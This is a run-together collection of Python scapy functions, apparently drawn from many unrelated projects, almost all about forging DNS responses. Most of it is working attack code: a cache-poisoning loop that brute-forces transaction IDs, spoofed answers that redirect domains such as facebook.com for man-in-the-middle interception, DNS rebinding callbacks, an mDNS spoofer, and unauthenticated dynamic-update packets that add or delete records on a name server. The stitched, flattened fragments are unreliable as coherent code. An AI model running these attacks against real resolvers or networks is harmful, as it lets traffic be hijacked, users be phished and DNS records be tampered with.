def spoofDNS(): dns_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) # print("Sub Domain", SUB_DOMAIN) Qdsec = DNSQR(qname=SUB_DOMAIN) Anssec = DNSRR(rrname=SUB_DOMAIN, type='A', rdata=SPROOF_ADDR, ttl=68900) dns = DNS(id=getRandomTXID(), aa=1, rd=0, qr=1, qdcount=1, ancount=1, nscount=2, arcount=0, qd=Qdsec, an=Anssec, ns=DNSRR(rrname=b'example.com', rdata=SPROOF_NS_1, type='NS') / DNSRR(rrname=b"example.com", type='NS', rdata=SPROOF_NS_2)) response = dns response.getlayer(DNS).qd.qname = SUB_DOMAIN for _ in range(125): # Set random TXID from 0 to 255 response.getlayer(DNS).id = getRandomTXID() sendPacket(dns_sock, response, DNS_ADDR, my_query_port) dns_sock.close()
def craft_and_send(pkt, dns_type, segment=None, is_hb=False, real_response=None): """ Craft a spoofed dns response and send it. """ spf_ip = IP(dst=pkt[IP].src) spf_udp = UDP(dport=pkt[UDP].sport, sport=53) if real_response: spf_resp = spf_ip / spf_udp / real_response[DNS] else: spf_dnsqr = DNSQR(qname=pkt[DNSQR].qname, qtype=dns_type) spf_dnsrr = DNSRR(rrname=pkt[DNSQR].qname, ttl=232, type=dns_type) if segment: spf_dnsrr.rdata = segment if is_hb: global hb_ip spf_dnsrr.rdata = hb_ip spf_dns = DNS(qr=1, id=pkt[DNS].id, qd=spf_dnsqr, an=spf_dnsrr) spf_resp = spf_ip / spf_udp / spf_dns global iface send(spf_resp, verbose=0, iface=iface)
def dnsSpoof(pkt): if not pkt.haslayer(DNSQR) or not pkt.haslayer(UDP): sendp(pkt, verbose=False) else: if (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst in globalargs.soaIP): # return the response to the victim (it will think its from the authoritative DNS) spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \ DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd, \ ns=DNSRR(rrname=globalargs.targetDomain, type='NS', rdata=globalargs.soaDomain[0], ttl=globalargs.ttl), \ ar=DNSRR(rrname=globalargs.soaDomain[0], type='A', rdata=globalargs.addressToForge, ttl=globalargs.ttl)) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + "Victim DNS poisoned...\n" + ccolors.NC elif (globalargs.randomSubdomain in pkt[DNS].qd.qname) and (pkt[IP].dst == globalargs.addressToForge): spoof_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) / \ UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) / \ DNS(id=pkt[DNS].id, qr=1, aa=1, rcode=0, qd=pkt[DNS].qd, \ an=DNSRR(rrname=pkt[DNS].qd.qname, type="A", rdata="123.123.123.123")) send(spoof_pkt, verbose=False) print ccolors.OKGREEN + "Attack successful!\n" + ccolors.NC + ccolors.WARNING + "Terminating..." + ccolors.NC sys.exit()
def test_addrlen_too_large(child): server.listen(DNS(qr=1, qdcount=TEST_QDCOUNT, ancount=TEST_ANCOUNT, qd=(DNSQR(qname=TEST_NAME, qtype=DNS_RR_TYPE_AAAA) / DNSQR(qname=TEST_NAME, qtype=DNS_RR_TYPE_A)), an=(DNSRR(rrname=TEST_NAME, type=DNS_RR_TYPE_AAAA, rdlen=18549, rdata=TEST_AAAA_DATA) / DNSRR(rrname=TEST_NAME, type=DNS_RR_TYPE_A, rdlen=DNS_RR_TYPE_A_DLEN, rdata=TEST_A_DATA)))) assert(not successful_dns_request(child, TEST_NAME, TEST_AAAA_DATA))
def handle_packet(self): pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0] pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0] pkt_udp = self._pkt.get_protocols(udp.udp) dns = DNS(self._pkt[-1]) cs = self._controller.get_customers() for c in range(len(cs)): if IPAddress(pkt_ip.src) in IPNetwork( cs[c].get_private_ip_subnet()): index = c #print'---##################INEX#############',index #self._controller.set_current_customer_id(index) #index=self._controller.get_current_customer_id() if pkt_udp is not None and self._pport is not None: new_pkt = packet.Packet() new_pkt.add_protocol( ethernet.ethernet(src='10:00:00:00:10:ff', dst=cs[index].get_next_hop_mac())) new_pkt.add_protocol( ipv4.ipv4(src='10.1.0.18', dst=cs[index].get_name_server(), proto=17)) #print '********index********',pkt_udp,'*******PORT********',self._pport,'######################' new_pkt.add_protocol(udp.udp(src_port=53, dst_port=self._pport)) #print'---pkt is created---til udp' #new_dns=DNS(rd=0,id=pkt_dns.id,qd=DNSQR(qname=pkt_dns.qd.qname),ns=DNSRR(rrname=pkt_dns.ar.rrname,type=1,ttl=60000,rdata=cs[index].get_name_server())) dns = DNS(rd=0, id=dns.id, qr=1L, qd=dns.qd, ancount=1, nscount=1, arcount=1, an=(DNSRR(rrname='ROOT-SERVER.', type='A', rclass='IN', ttl=60000, rdata='10.1.0.18')), ns=(DNSRR(rrname='ROOT-SERVER.', type='NS', rclass='IN', ttl=3600, rdata='.')), ar=DNSRR(rrname='ROOT-SERVER.', type='A', rclass='IN', ttl=60000, rdata='10.1.0.18')) #print('---DNS fo . SENT----',dns) new_pkt.add_protocol(dns) new_pkt.serialize() self.send_dns_packet(new_pkt, cs[index].get_datapath(), cs[index].get_ingress_port()) self._pport = None
def get_response(pkt): if DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0: if "student.pwr.edu.pl" in str(pkt["DNS Question Record"].qname): spf_resp = IP(src=pkt[IP].dst, dst=pkt[IP].src) /\ UDP(dport=pkt[UDP].sport, sport=53) / \ DNS(id=pkt[DNS].id, ancount=1, qr=1, an=DNSRR(rrname=pkt[DNSQR].qname, rdata=DNS_SERVER_IP, type=pkt[DNSQR].qtype) / DNSRR(rrname="student.pwr.edu.pl", rdata=DNS_SERVER_IP)) send(spf_resp, iface=IFACE) return f"Spoofed DNS Response Sent: {pkt[IP].src}"
def loud(args): poisoned = False # first packet sent to the victim NS to start the recursive domain to ip resolution reqPkt = IP(dst=args.victim) / UDP(sport=53) / DNS(qr=0, qd=DNSQR(qname="")) # authoritative record realNSRR = DNSRR(rrname=args.targetDomain, type='NS', rdata=args.soaDomain[0], ttl=args.ttl) # fake additional record (glue) fakeARR = DNSRR(rrname=args.soaDomain[0], type='A', rdata=args.addressToForge, ttl=args.ttl) amount = 5 resPkts = list() for x in xrange(0, amount - 1): resPkts.append( IP(dst=args.victim) / UDP(sport=53, dport=54) / DNS(aa=1, qr=1, qd=DNSQR(qname=""), ns=realNSRR, ar=fakeARR)) while not poisoned: # generate random subdomain, i.e. 1234www5678.example.com queryDomain = utils.getRandomSubdomain() + args.targetDomain for x in xrange(0, amount - 1): resPkts[x][DNS].id = utils.getRandomTXID() resPkts[x][DNS].qd.qname = queryDomain reqPkt[DNS].qd.qname = queryDomain send(reqPkt, verbose=False) for x in xrange(0, amount - 1): send(resPkts[x], verbose=False) # ask the victim for the IP of the domain we are trying to spoof pkt = sr1(IP(dst=args.victim) / UDP(sport=53) / DNS(qr=0, qd=DNSQR(qname=args.soaDomain[0], qtype='A')), verbose=False) if pkt[DNS].an and pkt[DNS].an.rdata: actualAnswer = str(pkt[DNS].an.rdata) # if the IP is our IP, we poisoned the victim if actualAnswer == args.addressToForge: poisoned = True print ccolors.OKGREEN + 'Poisoned now!\n' + ccolors.NC deltaTime = datetime.datetime.now() - args.startTime print ccolors.WARNING + 'It took: ' + str(deltaTime) + ccolors.NC
def get_response(pkt: IP): print("XD") if (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0): print("XD") if page_name in str(pkt["DNS Question Record"].qname): spf_resp = IP(dst=pkt[IP].src) / UDP( dport=pkt[UDP].sport, sport=53) / DNS( id=pkt[DNS].id, ancount=1, an=DNSRR(rrname=pkt[DNSQR].qname, rdata=FAKE_IP) / DNSRR(rrname=page_name, rdata=FAKE_IP)) spf_resp.show() send(spf_resp, verbose=0, iface=IFACE) return f"Spoofed DNS Response Sent: {pkt[IP].src}"
def dns_callback(pkt): if DNS in pkt and not UDPerror in pkt: global first_request global dns_id ip = pkt.getlayer(IP) dns = pkt.getlayer(DNS) if dns.qr: return dns.summary() else: if dns.qd != None and dns_id != dns.id: if confusion in dns.qd.qname: dns_id = dns.id answer = IP(dst=ip.src, src=ip.dst) / UDP( dport=ip.sport, sport=ip.dport) / DNS( id=dns.id, qr=1, qd=dns.qd, an=DNSRR(rrname=dns.qd.qname, type="CNAME", ttl=dns_ttl, rdata=attacker) / DNSRR(rrname=attacker, ttl=dns_ttl, rdata=victim)) send(answer, loop=0) return dns.summary() elif attacker in dns.qd.qname: dns_id = dns.id answer = IP(dst=ip.src, src=ip.dst) / UDP( dport=ip.sport, sport=ip.dport ) / DNS( id=dns.id, qr=1, qd=dns.qd, an=DNSRR(rrname=dns.qd.qname, ttl=dns_ttl, rdata=attacker_ip) / DNSRR(rrname=dns.qd.qname, ttl=dns_ttl, rdata=victim)) send(answer, loop=0) return dns.summary()
def dns_callback(pkt): if DNS in pkt and not UDPerror in pkt: global first_request global dns_id ip = pkt.getlayer(IP) dns = pkt.getlayer(DNS) if dns.qr: return dns.summary() else: if dns.qd != None and attacker in dns.qd.qname: if dns_id != dns.id: dns_id = dns.id ip_answer = attacker_ip if first_request else victim if first_request: first_request = False answer = IP(dst=ip.src, src=ip.dst) / UDP( dport=ip.sport, sport=ip.dport) / DNS( id=dns.id, qr=1, qd=dns.qd, an=DNSRR(rrname=dns.qd.qname, ttl=dns_ttl, rdata=ip_answer)) send(answer, loop=0) return dns.summary()
def forge_packet(self, pkt, rdata="", rcode=0): d = pkt[IP].src dp = pkt[UDP].sport id = pkt[DNS].id q = pkt[DNS].qd t = pkt[DNSQR].qtype if t == TXT: # if scapy is patched: # rdata = txtfy(rdata) for i in range(0, len(rdata), 0xff + 1): rdata = rdata[:i] + chr(len(rdata[i:i + 0xff])) + rdata[i:] an = (None, DNSRR(rrname=self.dn, type=t, rdata=rdata, ttl=60))[rcode == 0] ns = DNSRR(rrname=self.dn, type="NS", ttl=3600, rdata="ns." + self.dn) return IP(dst=d) / UDP(dport=dp) / DNS( id=id, qr=1, rd=1, ra=1, rcode=rcode, qd=q, an=an, ns=ns)
def __decodeRR(self, name, s, p): ret = s[p:p + 10] type, cls, ttl, rdlen = unpack("!HHIH", ret) p += 10 rr = None if type == 15: rr = DNSMXRR("\x00" + ret + s[p:p + rdlen]) rr.rdata = DNSgetstr(s, p + 2)[0] rr.rdlen = rdlen elif type == 6: rr = DNSSOARR("\x00" + ret + s[p:p + rdlen]) rr.mname, q = DNSgetstr(s, p) rr.rname, q = DNSgetstr(s, q) rr.serial, rr.refresh, rr.retry, rr.expire, rr.minimum = unpack( '!IIIII', s[q:q + 20]) rr.rdlen = rdlen else: rr = DNSRR("\x00" + ret + s[p:p + rdlen]) if 2 <= rr.type <= 5: rr.rdata = DNSgetstr(s, p)[0] del rr.rdlen p += rdlen rr.rrname = name return rr, p
def main(): mode = sys.argv[1] if len(sys.argv) > 1 else "none" if not mode in ["fakenx", "fake"]: print >> sys.stderr, 'Please supply argv[1] in ["fakenx", "fake"]' return 1 udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udps.bind((BIND_TO, 53)) while 1: data, addr = udps.recvfrom(1024) p = DNS(data) rp = DNS(id=p.id, qr=1, qdcount=p.qdcount) rp.qd = p[DNSQR] if p.opcode == 0: rp.ancount = 1 rp.rcode = 0 answer_ip = ANSWER_WITH if mode == "fakenx": answer_ip = resolve_or_fake(p.qd[0].qname) rp.an = DNSRR(rrname=p.qd[0].qname, ttl=60, rdlen=4, rdata=answer_ip) print " - Responding to {0} with {1}.".format( p.qd[0].qname, answer_ip) else: rp.ancount = 0 rp.rcode = 2 print " ! Query opcode {0}, answering servfail.".format(p.opcode) udps.sendto(rp.build(), addr)
def dns_poison(pkt): # return if the packet does not have a DNS layer if not pkt.haslayer(DNSQR): return qd = pkt[DNS].qd # return if not a dns query or does not have a qtype of "A" if pkt[DNS].qr != 0 or qd.qtype != 1: return # dns answer with spoofed ip dns_an = DNSRR(rrname=qd.qname, type="A", ttl=30, rdata=poison_ip) sendp( Ether() / # empty Ether packet makes it work (idk why?) IP(src=pkt[IP].dst, dst=pkt[IP].src) / # switch IP src and dst UDP(sport=pkt[UDP].dport, dport=pkt[UDP].sport) / # switch udp sport and dport DNS(id=pkt[DNS].id, qr=1, aa=1, ad=1, ra=0, an=dns_an, ancount=1, qd=qd), # spoofed dns packet iface=interface, verbose=0)
def modify(packet): pkt = IP(packet.get_payload()) if pkt.qd.qname == b'facebook.com.': print(pkt.show()) p = Ether( dst=self.MacList[0], src=self.LocalMac, type=2048) / IP(src=pkt[IP].dst, dst=pkt[IP].src) / UDP( sport=53, dport=pkt[UDP].sport) / DNS( id=pkt[DNS].id, qr=1, qdcount=1, ancount=1, nscount=0, arcount=0, qd=DNSQR( qname=pkt[DNS].qd.qname, qtype=1, qclass=1), an=DNSRR(rrname=pkt[DNS].qd.qname, type=1, rclass=1, rdata=ip), ns=None, ar=None) sendp(p, verbose=0) #packet.set_payload(bytes(str(pkt), 'utf-8')) #set the packet content to our modified version packet.drop() #drop the packet else: packet.accept()
def process_packet(self, packet): """ Determines how to process each packet in queue. Parses for those with DNS response, modifies response such that target_url resolves to the redirect_ip. """ # wrap payload packet in Scapy IP layer scapy_packet_obj = IP(packet.get_payload()) if (scapy_packet_obj.haslayer(DNSRR)): q_name = scapy_packet_obj[DNSQR].qname if (self.target_url in q_name): print("[+] Resolving to provided IP...") manufactured_res = DNSRR(rrname=q_name, rdata=self.redirect_ip) scapy_packet_obj[ DNS].an = manufactured_res # supplant DNS answer scapy_packet_obj[ DNS].ancount = 1 # consolidate DNS answers to 1 # CRITICAL: scapy will autogen correct len + checksum contingent on new data del scapy_packet_obj[IP].len del scapy_packet_obj[IP].chksum del scapy_packet_obj[UDP].len del scapy_packet_obj[UDP].chksum # distill into original packet obj packet.set_payload(str(scapy_packet_obj)) packet.accept()
def craft_MDNS_IPv6(self, packet: Packet) -> Packet: """ This function crafts a MDNS-IPv6 packet. """ name = packet[DNSQR].qname return ( [ IPv6(dst=self.multicast_v6) / UDP(sport=5353, dport=5353) / DNS( qr=1, aa=1, rd=0, ancount=self.ipv6_number, an=self.craft_DNSv6_response(name), ), IPv6(dst=self.multicast_v6) / UDP(sport=5353, dport=5353) / DNS( qr=1, aa=1, rd=0, ancount=1, an=DNSRR(ttl=30, rrname=name, rdata=self.ip), ), ], packet[IPv6].src, name, "DNS", )
def handle_socket_msg(self): pkt_eth = self._pkt.get_protocols(ethernet.ethernet)[0] pkt_ip = self._pkt.get_protocols(ipv4.ipv4)[0] pkt_udp = self._pkt.get_protocols(udp.udp)[0] pkt_dns = DNS(self._pkt[-1]) print('----------------Sent query with ID', pkt_dns.id, pkt_dns) if pkt_udp.dst_port == 53 or pkt_udp.src_port == 53: #print 'A DNS query for controller is received' if pkt_dns: cs = self._controller.get_customers() d_mac = cs[0].get_next_hop_mac() pkt_dns.qr = 0 new_pkt = packet.Packet() e = ethernet.ethernet(dst=cs[0].get_next_hop_mac(), src=pkt_eth.src) new_pkt.add_protocol(e) new_pkt.add_protocol( ipv4.ipv4(src=self._controller.get_ip(), dst=cs[0].get_name_server(), proto=17)) new_pkt.add_protocol( udp.udp(src_port=pkt_udp.dst_port, dst_port=pkt_udp.src_port)) new_dns = DNS(rd=0, id=pkt_dns.id, qd=DNSQR(qname=pkt_dns.qd.qname), ns=DNSRR(rrname=pkt_dns.ar.rrname, type=1, ttl=60000, rdata=cs[0].get_name_server())) new_pkt.add_protocol(new_dns) new_pkt.serialize() self.send_dns_packet(new_pkt, cs[0].get_datapath(), cs[0].get_ingress_port())
def add_a_record(name_server, new_dns_record, ip_value): os.system('clear') title() # Verifying all required options have a populated value if name_server is None or new_dns_record is None or ip_value is None: print "[*] ERROR: You did not provide all the required command line options!" print "[*] ERROR: Please re-run with required options." sys.exit() print "[*] Crafting packet for record injection..." print "[*] Sending DNS packet adding " + new_dns_record print "[*] and pointing it to " + ip_value + "\n" dns_zone = new_dns_record[new_dns_record.find(".") + 1:] # Craft the packet with scapy add_packet = sr1( IP(dst=name_server) / UDP() / DNS(opcode=5, qd=[DNSQR(qname=dns_zone, qtype="SOA")], ns=[ DNSRR(rrname=new_dns_record, type="A", ttl=120, rdata=ip_value) ])) print add_packet[DNS].summary() print "\n[*] Packet created and sent!"
def test_from_datasources(): packets_1 = [ Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) / HTTP() / HTTPRequest(Method="GET", Path="/foo", Host="https://google.com") ] packets_2 = [ # HTTP Packet Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=12345, dport=80) / HTTP() / HTTPRequest(Method="GET", Path="/foo", Host="https://google.com"), # DNS Packet Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / UDP(sport=80, dport=53) / DNS(rd=1, qd=DNSQR(qtype="A", qname="google.com"), an=DNSRR(rdata="123.0.0.1")), # TCP Packet Ether(src="ab:ab:ab:ab:ab:ab", dst="12:12:12:12:12:12") / IP(src="127.0.0.1", dst="192.168.1.1") / TCP(sport=80, dport=5355), ] nx = NetworkX.from_datasources([ packets_to_datasource_events(packets) for packets in [packets_1, packets_2] ]) # Make the graph nx.graph() assert not nx.is_empty()
def delete_dns_record(del_ns, del_record): os.system('clear') title() # Verifying all required options have a populated value if del_ns is None or del_record is None: print "[*] ERROR: You did not provide all the required command line options!" print "[*] ERROR: Please re-run with required options." sys.exit() print "[*] Crafting packet for record deletion..." print "[*] Sending packet which deletes the following record: " print "[*] " + del_record + "\n" dns_zone = del_record[del_record.find(".") + 1:] del_packet = sr1( IP(dst=del_ns) / UDP() / DNS(opcode=5, qd=[DNSQR(qname=dns_zone, qtype="SOA")], ns=[ DNSRR(rrname=del_record, type="ALL", rclass="ANY", ttl=0, rdata="") ])) print del_packet[DNS].summary() print "\n[*] Packet created and sent!"
def spoof_dns_response(orig_pkt, spoof_ip, iface): """ Summary: This method responds to DNS Query by spoofing and can be utilized for Man In The Middle(MITM) attack. """ print(f"Spoofing: {orig_pkt[DNSQR].qname.decode('UTF-8')}") try: # Construct DNS response with following modifications # qr: 1 --> response # ra: 1 --> recursion available # ancount:1 --> count of answers provided # an --> Spoofed DNS answer with dummy fixed ttl and IP dns_resp = DNS(id=orig_pkt[DNS].id, qr=1, ra=1, ancount=1, qdcount=orig_pkt[DNS].qdcount, qd=orig_pkt[DNS].qd, an=DNSRR(rrname=orig_pkt[DNSQR].qname, rdata=spoof_ip, ttl=DNS_TTL)) resp_pkt = IP(dst=orig_pkt[IP].src, src=orig_pkt[IP].dst) / UDP( dport=orig_pkt[UDP].sport, sport=53) / DNS() resp_pkt[DNS] = dns_resp # Sending DNS response send(resp_pkt, verbose=0, iface=iface) return f"Spoofed DNS Response Sent: {orig_pkt[IP].src}" except Exception as err: raise err
def buildp(self, dnsp, payload=None): n = DNS(id=dnsp.id,qr=1,opcode=0,aa=1,tc=0,rd=dnsp.rd,ra=0,qdcount=dnsp.qdcount,nscount=0,arcount=0,qd=dnsp.qd) if payload: a = DNSRR(rrname=dnsp.qd.qname,type=1,rclass=1,ttl=60,rdlen=4,rdata=payload) n.an = a n.ancount = 1 return n
def main(): udps = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) udps.bind((BIND_TO, 53)) while 1: data, addr = udps.recvfrom(1024) p = DNS(data) rp = DNS(id=p.id, qr=1, qdcount=p.qdcount) rp.qd = p[DNSQR] if p.opcode == 0: rp.ancount = 1 rp.rcode = 0 answer_ip = resolve_or_fake(p.qd[0].qname) rp.an = DNSRR(rrname=p.qd[0].qname, ttl=60, rdlen=4, rdata=answer_ip) print " - Responding to {0} with {1}.".format( p.qd[0].qname, answer_ip) else: # servfail rp.ancount = 0 rp.rcode = 2 print " ! Query opcode {0}, answering servfail.".format(p.opcode) udps.sendto(rp.build(), addr)
def manipulate(self, package): pkt = IP(package.get_payload()) udp = pkt.getlayer(DNSRR) qname = pkt[DNSQR].qname type_id = pkt[DNSQR].qtype if (type_id == self.reg_a): new_ip = self.ipv4 elif (type_id == self.reg_aaaa): new_ip = self.ipv6 try: # Read dns name ip = pkt[DNS][2].rdata # Set new spoofed dns record pkt[DNS].an = DNSRR(rrname=qname, type=type_id, rdata=new_ip) # Set 1 record in the response pkt[DNS].ancount = 1 # Delete checksum and length del pkt.chksum del pkt.len del pkt[UDP].chksum del pkt[UDP].len self.log("---------------------------------") self.log("[*] DNS query:") self.log("---------------------------------") self.log("\tName: " + qname + " : " + ip + " -> " + new_ip) package.set_payload(bytes(pkt)) except Exception as e: #print(e) pass #print(package) package.accept()
def modify_packet(packet): qname = packet[DNSQR].qname qname = qname.decode() qtype = qtype_(packet) rule, ip = _makeDecision(qname) if rule != "": _success(f"'{GREEN}{packet[IP].dst}{WHITE}' Querying {WHITE}'{GREEN}{qtype}{WHITE}' record ,{WHITE}'{GREEN}{qname}{WHITE}', {CYAN}redtirect{WHITE} to{CYAN} → {WHITE}'{GREEN}{ip}{WHITE}'.") packet[DNS].an = DNSRR(rrname=qname, rdata=ip) else: _ignore(f"'{BLUE}{packet[IP].dst}{WHITE}' Querying {WHITE}'{YELLOW}{qtype}{WHITE}' record , {WHITE}'{YELLOW}{qname}{WHITE}', ignoring...") packet[DNS].an = DNSRR(rrname=qname, rdata=packet[DNSRR].rdata) packet[DNS].ancount = 1 del packet[IP].len del packet[IP].chksum del packet[UDP].len del packet[UDP].chksum return packet
def get_response(pkt: IP): if (DNS in pkt and pkt[DNS].opcode == 0 and pkt[DNS].ancount == 0): if "www.google123.com" in str(pkt["DNS Question Record"].qname): spf_resp = IP(dst=pkt[IP].src) / UDP( dport=pkt[UDP].sport, sport=53) / DNS( id=pkt[DNS].id, rcode=0, ancount=1, an=DNSRR(rrname=pkt[DNSQR].qname, rdata=local_ip) / DNSRR(rrname="www.google123.com", rdata=local_ip)) print(spf_resp[DNS].show()) send(spf_resp, verbose=0, iface=IFACE) return f"Spoofed DNS Response Sent: {pkt[IP].src}" else: # make DNS query, capturing the answer and send the answer return forward_dns(pkt)
def auth(self, dnsp, a): challenge = randtok() self.pendingauth = (dnsp.qd.qname[:dnsp.qd.qname.find('.auth.dyn')], challenge) ad = DNSRR(rrname='challenge.dyn.ctf.itsec.', type=5, rclass=1, ttl=60, rdata = challenge) a.ar = ad a.arcount = 1 self.send(a.build())
def parse(s): if 'Standard query response' not in s: args = s.split() print(args) tmp = int(args[9], 16) transaction_id = hex(tmp) print(transaction_id) pkt = (IP(src='192.168.1.1', dst='192.168.1.100') / UDP(sport=53, dport=4673) / DNS(id=int(tmp), qr=1, nscount=1, an=None, arcount=1, qd=DNSQR(qname=args[11]), ns=(DNSRR(rrname=args[11], type='NS', ttl=36000, rdata='args[11]')), ar=(DNSRR(rrname=args[11], type="A", ttl=36000, rdata='127.0.0.1')))) send(pkt) print("### Packet sent ###")
def calculate_limit_size(self, pkt): s = self.pkt_max_size - len( pkt[DNS]) - 2 * len(DNSRR()) - 3 * len(self.dn) - len("ns.") - 10 if pkt[DNSQR].qtype == TXT: max_size = 512 s -= len(str(s)) else: max_size = self.qname_max_size return min((s, 1)[s < 1], max_size)